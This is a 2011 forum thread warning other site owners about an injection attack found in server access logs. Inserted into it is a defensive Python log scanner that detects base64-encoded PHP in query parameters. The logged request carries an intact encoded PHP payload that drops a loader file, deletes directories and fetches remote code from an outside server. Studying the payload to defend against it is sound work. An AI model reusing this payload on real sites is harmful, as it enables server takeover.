ajax code injection hacking attempt

Discussion in 'Javascript' started by me, Sep 7, 2011.

  1. me

    me Guest

    :)

    I came across this in my log files today, and thought I'd warn people who
    use Ajax. (Could be a well-documented thing, I don't know where to check)

    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /engine/ajax/updates.php?wert=1&user_id=QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei4zNDQwNDY5M2JiNzE4ZmFmZDg1NzI3MTg4M2M2NmQ3Ni5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5ZbkJyZEdWdkp6c0tKRzVsZDBScGNpQTlJQ2RpY0d0MFpXOG5Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxqTTBOREEwTmprelltSTNNVGhtWVdaa09EVTNNamN4T0Rnell6WTJaRGMyTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0WkdseUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNBM056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1RzS0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJGa1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUdacGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==
    HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
    SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST
    /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible;
    MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
    77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET
    /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0
    (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

    Marc.
     
    me, Sep 7, 2011
    #1
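    One defender-side check this pattern suggests, as an added example that is not code from the original thread or from either poster: a small Python scanner that pulls query parameters out of Apache-style access-log lines, decodes values that look like base64, and flags those that decode to PHP source. The log lines, addresses and payload below are constructed stand-ins (the real payload is not reproduced), and the marker list and 32-character length threshold are assumptions to tune for your own site.

```python
import base64
import re
from urllib.parse import unquote

# Request part of an Apache combined-log line: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (?P<target>\S+) HTTP/[\d.]+"')
# A base64 value worth decoding: long, base64 alphabet only, optional padding.
B64_RE = re.compile(r'^[A-Za-z0-9+/]{32,}={0,2}$')
PHP_MARKERS = ('<?php', 'ini_set(', 'base64_decode(', 'fopen(', 'fwrite(',
               'eval(', 'system(', 'exec(', 'file_get_contents(')

def query_params(target):
    """Split the query string; unquote() keeps '+', which is a base64 character."""
    _, _, query = target.partition('?')
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            yield unquote(name), unquote(value)

def php_in_base64_params(log_line):
    """Return [(param, marker)] for query parameters whose base64 decoding looks like PHP."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    hits = []
    for name, value in query_params(match.group('target')):
        if not B64_RE.match(value):
            continue
        try:
            decoded = base64.b64decode(value, validate=True).decode('utf-8', 'replace')
        except ValueError:  # bad padding; binascii.Error is a ValueError
            continue
        marker = next((m for m in PHP_MARKERS if m in decoded), None)
        if marker:
            hits.append((name, marker))
    return hits

def scan_log(lines):
    """Return [(line_no, client_ip, param, marker)] for every line carrying such a payload."""
    return [(n, line.split(' ', 1)[0], param, marker)
            for n, line in enumerate(lines, 1)
            for param, marker in php_in_base64_params(line)]

# Constructed sample lines shaped like the thread's excerpt (RFC 5737 test addresses); the payload is a harmless one-line stand-in.
SAMPLE_PAYLOAD = base64.b64encode(b"@ini_set('allow_url_fopen', 1);\n").decode()
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Sep/2011:09:07:58 +0200] "GET /engine/ajax/updates.php?wert=1&user_id=' + SAMPLE_PAYLOAD + ' HTTP/1.1" 301 3844 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [06/Sep/2011:09:07:58 +0200] "POST /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [06/Sep/2011:09:08:01 +0200] "GET /engine/ajax/updates.php?wert=1&user_id=42 HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]
```

Running `scan_log` over a real access log flags the first request shape in the thread (encoded PHP in `user_id`) while leaving ordinary numeric values and query-less POSTs alone; adding the 301-to-POST follow-up as a correlation rule is a natural next step.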


  2. I've decoded the above here: http://pastebin.com/1vwJEUw0
     
    Michael Haufe (TNO), Sep 7, 2011
    #2

  3. me

    me Guest

    Thanks; googling their server name reveals it's a known attack that's been
    around since 2009; more info at: http://pastebin.com/Qtk8jSfR

    Marc.
     
    me, Sep 7, 2011
    #3
